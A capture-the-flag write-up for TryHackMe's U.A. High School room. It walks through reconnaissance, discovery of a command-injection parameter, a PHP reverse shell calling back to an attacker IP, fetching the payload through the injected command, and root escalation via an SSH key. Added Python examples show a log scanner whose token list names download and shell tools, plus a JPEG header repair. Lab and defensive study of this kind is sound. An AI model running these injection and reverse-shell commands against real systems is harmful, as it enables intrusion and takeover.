
[Linux] U.A.HighSchool

This page aims to provide a clear and comprehensive write-up for the U.A. High School room on TryHackMe. I used Kali Linux to conduct the penetration test.

Reconnaissance

Let's start with a basic Nmap scan without any options, which runs quickly.

sudo nmap 10.10.242.225
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

By default, Nmap scans only the first 1000 ports. An extended scan of ports 1001 to 65535 does not show any open ports; some are filtered, which means that Nmap cannot determine whether the port is open or closed. Let's continue with these two ports.

It is recommended to perform a more precise analysis of the discovered ports. In our case, this does not reveal anything useful for the rest of the journey. Below, I have listed some useful Nmap commands for reconnaissance.

sudo nmap -sC -sV -p 22,80 10.10.242.225
sudo nmap -A -p 22,80 10.10.242.225
sudo nmap --script vuln -p 22,80 10.10.242.225

Enumeration

HTTP


Based on experience, it is easier to start enumeration with the web application. So, let's see what information we can gather on port 80.

Directory listing

In web application testing, it's essential to perform a deep and thorough directory enumeration to find pages and their subpages. REALLY!!!

To start, we can use the wordlist located at /usr/share/wordlists/dirb/common.txt.

gobuster dir -u http://10.10.26.54 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/assets               (Status: 301) [Size: 311] [--> http://10.10.26.54/assets/]
/index.html           (Status: 200) [Size: 1988]
/server-status        (Status: 403) [Size: 276]

We have found a subdirectory called assets, which we can enumerate in the same way.

gobuster dir -u http://10.10.26.54/assets -w /usr/share/wordlists/dirb/common.txt
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/images               (Status: 301) [Size: 318] [--> http://10.10.26.54/assets/images/]
/index.php            (Status: 200) [Size: 0]

Nothing else was found with other wordlists. Using Burp Suite, we can obtain the sitemap:

There is nothing special or interesting on the pages about.html, admissions.html, contact.html, courses.html, or index.html. We cannot access the /assets/images page or folder, so we'll focus on /assets/index.php.

Vulnerabilities

When a web application is configured correctly, the content of a PHP file is not visible on the client side: PHP is interpreted on the server, and only the result is sent to the client. The index.php file can accept parameters from the client through GET or POST requests, and those parameters often hide information that matters when pentesting a web application. Since the PHP source is not visible, the parameters we are looking for are hidden too.

arjun can be used to find hidden parameters, but it did not find anything in this case, so I tried dirsearch.

arjun -u http://10.10.26.54/assets/index.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[!] No parameters were discovered.

dirsearch seems to work.

dirsearch -u http://10.10.26.54/assets/index.php
[13:23:41] Starting: assets/index.php/
[13:23:44] 404 -  273B  - /assets/index.php/%2e%2e//google.com
[13:24:14] 200 -   56B  - /assets/index.php/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir

We found the parameter cmd, through which we can inject Linux commands.

The output appears to be base64-encoded, so let's decode it in our own terminal to proceed.

We can exploit that vulnerability to get a reverse shell.
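Before moving on to exploitation, here is the defender's view of the same finding. The script below is an added example and is not part of the original write-up: it scans Apache access-log lines for requests that carry the undocumented cmd parameter, decodes the value and rates it, so that the staging requests (fetching and then running a script through the parameter) stand out from a single probe. The log lines are constructed for this example; the addresses mirror the ones in the write-up, and the regex assumes the Apache "combined" log format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format (not taken from the room);
# the attacker and target addresses mirror the ones used in this write-up.
SAMPLE_LOG = """\
10.9.223.245 - - [10/Mar/2024:13:24:14 +0000] "GET /assets/index.php/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir HTTP/1.1" 200 56 "-" "dirsearch"
10.9.223.245 - - [10/Mar/2024:13:30:02 +0000] "GET /assets/index.php?cmd=wget%2010.9.223.245:8000/rshell HTTP/1.1" 200 120 "-" "curl/8.4.0"
10.9.223.245 - - [10/Mar/2024:13:31:10 +0000] "GET /assets/index.php?cmd=sh%20rshell HTTP/1.1" 200 0 "-" "curl/8.4.0"
192.168.1.5 - - [10/Mar/2024:13:32:00 +0000] "GET /about.html HTTP/1.1" 200 1988 "-" "Mozilla/5.0"
192.168.1.5 - - [10/Mar/2024:13:33:00 +0000] "GET /assets/index.php?cmd=ls HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens that turn a bare command into a likely staging action (download a
# payload, launch an interpreter or a shell). Matched on the decoded value.
STAGING_TOKENS = ("wget", "curl", "nc ", "sh ", "bash", "python", "php", "/bin/")
SHELL_META = re.compile(r"[;|&`$]")


def parse_line(line: str):
    """Split one access-log line into its fields, or return None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_cmd(target: str):
    """Return the decoded value of the cmd query parameter, or None if absent."""
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)  # parse_qs percent-decodes
    values = params.get("cmd")
    return values[0] if values else None


def classify(cmd: str) -> str:
    """Rate a command value: 'high' if it stages a payload, chains commands or
    starts a shell/interpreter; otherwise 'medium' (any cmd= request is abnormal)."""
    lowered = cmd.lower()
    if SHELL_META.search(cmd) or any(tok in lowered for tok in STAGING_TOKENS):
        return "high"
    return "medium"


def scan_log(text: str):
    """Return one finding per request that carries a cmd parameter."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cmd = extract_cmd(rec["target"])
        if cmd is None:
            continue
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": urlsplit(rec["target"]).path,
            "status": rec["status"],
            "cmd": cmd,
            "severity": classify(cmd),
        })
    return findings


def sources_with_high_severity(findings):
    """Client addresses that issued at least one high-severity request."""
    return sorted({f["ip"] for f in findings if f["severity"] == "high"})


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:6} {f['ip']:14} {f['path']}  cmd={f['cmd']!r}")
    print("sources to escalate:", sources_with_high_severity(results))
```

Run against the constructed lines, the two curl requests from the exploitation phase are rated high and the dirsearch probe medium, which is the order an analyst would want to triage them in. The token list is a heuristic (a value such as "sync " also contains "nc "), so treat it as a starting point and tune it against the application's real traffic; the stronger signal is that a parameter the application never documents is being called at all.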

Exploitation

Reverse shell

I will upload a file to the target to obtain a reverse shell.

On my machine: Create a file named rshell containing the following code:

php -r '$sock=fsockopen("10.9.223.245",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

Start a web server on the local machine:

python3 -m http.server

Open another terminal and type the following command to upload the reverse shell file through the cmd parameter.

curl http://10.10.26.54/assets/index.php?cmd="wget%2010.9.223.245:8000/rshell" | base64 -d

Yes, it worked!

Now we should start a listener on the local machine and then run the PHP file on the remote host.

nc -nlvp 4242 # attacker: Terminal 1 (start the listener first)

curl http://10.10.26.54/assets/index.php?cmd="sh%20rshell" | base64 -d # attacker: Terminal 2

We got our reverse shell.

Let's make it stable.

# On reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z

# On local machine terminal
stty raw -echo; fg

Enumeration

We can explore our new system.

alias ls="ls -al --color"

The content of /assets/images is interesting. We can download it to our local machine for deeper analysis, so let's start a web server from the reverse shell to serve those files.

We continue our exploration and find interesting content in a directory called Hidden_Content.

Passphrase: AllmightForEver!!!

We can see the user flag but we do not have read permission.

User: deku

Let's see what we can find on the images.

We are not able to see the content of the other image:

The file extension (jpg) does not match the magic number (png).

Renaming the file to .png still does not let us view the image, so we change the magic number instead.

For jpg (JFIF) it is FF D8 FF E0 00 10 4A 46 49 46 00 01.

hexeditor oneforall.jpg
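The signature check and the header fix, as an added example that is not the author's hexeditor session: a small Python script that reports when a file's extension disagrees with its magic number and overwrites the first 12 bytes with the JFIF header quoted above, which is exactly what the manual edit does. The damaged sample bytes are constructed for this example (a JFIF header whose first eight bytes were overwritten with the PNG signature), not the room's image.

```python
from pathlib import Path

# Leading byte signatures ("magic numbers") for the formats handled here.
SIGNATURES = {
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "jpg": bytes.fromhex("FFD8FF"),
    "gif": b"GIF8",
}

# Full 12-byte JFIF header from the write-up: SOI, APP0 marker, segment length
# 0x0010, the "JFIF\0" identifier and the major version byte.
JFIF_HEADER = bytes.fromhex("FFD8FFE000104A4649460001")

# Constructed sample: a JFIF stream whose first eight bytes were overwritten with
# the PNG signature, leaving the tail of the APP0 segment intact. Not the image
# from the room.
DAMAGED_SAMPLE = (
    SIGNATURES["png"]
    + bytes.fromhex("49460001")          # remaining bytes of "JFIF\0" + major version
    + bytes.fromhex("0100000100010000")  # minor version, units, X/Y density, no thumbnail
    + bytes.fromhex("FFD9")              # EOI so the sample is a (tiny) complete stream
)


def detect_type(data: bytes) -> str:
    """Identify a file by its leading bytes, independent of its extension."""
    for name, sig in SIGNATURES.items():
        if data.startswith(sig):
            return name
    return "unknown"


def extension_matches(filename: str, data: bytes) -> bool:
    """True if the file extension agrees with the detected magic number."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext == "jpeg":
        ext = "jpg"
    return ext == detect_type(data)


def patch_jfif_header(data: bytes) -> bytes:
    """Overwrite the first 12 bytes with a canonical JFIF header.

    This mirrors the manual hexeditor step: it only helps when the original
    header was overwritten in place and the rest of the JPEG stream is intact.
    """
    if len(data) < len(JFIF_HEADER):
        raise ValueError("file too short to hold a JFIF header")
    return JFIF_HEADER + data[len(JFIF_HEADER):]


def repair_file(src: str, dst: str) -> str:
    """Write a header-patched copy of src to dst and return the detected type."""
    data = Path(src).read_bytes()
    fixed = patch_jfif_header(data)
    Path(dst).write_bytes(fixed)
    return detect_type(fixed)


if __name__ == "__main__":
    name = "oneforall.jpg"  # hypothetical file name, matching the write-up
    print("before:", detect_type(DAMAGED_SAMPLE), extension_matches(name, DAMAGED_SAMPLE))
    fixed = patch_jfif_header(DAMAGED_SAMPLE)
    print("after: ", detect_type(fixed), extension_matches(name, fixed))
```

Use repair_file to write a patched copy rather than editing the original in place, so the unmodified evidence is preserved for comparison. If the patched file still does not open, the damage goes beyond the 12-byte header and a blind overwrite is the wrong tool.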

We can use Stegseek with the passphrase we found to try to extract some information.

It seems we got deku's password.

Escalation

sudo -l

After a long period of reflection, we decided to exploit the eval function and redirect the echo output somewhere. It is possible to add our SSH public key to the root user's authorized_keys.

SSH

Remediation
